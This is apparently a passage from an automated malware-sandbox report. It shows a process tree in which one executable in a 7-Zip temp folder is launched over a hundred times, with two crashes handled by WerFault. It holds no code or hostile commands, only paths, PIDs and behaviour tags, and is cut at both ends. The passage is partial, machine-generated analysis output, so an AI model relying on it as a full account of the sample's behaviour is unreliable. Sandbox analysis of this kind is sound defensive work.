        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5684
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1972
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3692
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2088
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3136
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6316
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6456
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6704
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5360
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1580
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4696
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7272
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7288
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7376
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7464
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7596
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7676
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7784
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7868
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7964
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8024
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8040
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8116
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5816
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3540
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2592
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5408
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3988
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4180
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6840
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2204
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7704
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7716
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7716 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:7840
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7732
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7904
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8008
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5932
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8180
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4300
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7404
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3064
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7080
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6084
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7724
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7460
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4696
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7964
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8068
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6584
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7452
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6972
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4564
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4052
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4092
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3536
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8140
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6944
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7924
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3080
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4764
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7720
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3276
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7232
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7852
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4536
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6344
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8104
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:792
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3324
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5756
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7400
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6872
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7440
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5044
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4068
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7896
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7960
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6336
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4140
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6292
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6292 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5668
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4512
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7812
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4532
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7332
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2560
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3252
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7448
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7200
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8064
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6176
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1032
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6844
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6456
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1732
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6624
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7896
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5916
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6216
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7744
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6340
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4144
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7708
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7188
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3428
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5784
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5492
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4696
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2240
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7944
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3412
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4976
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7108
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7540
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2020
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1968
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7148
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:352
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7988
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2588
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7768
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7220
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8120
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:768
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
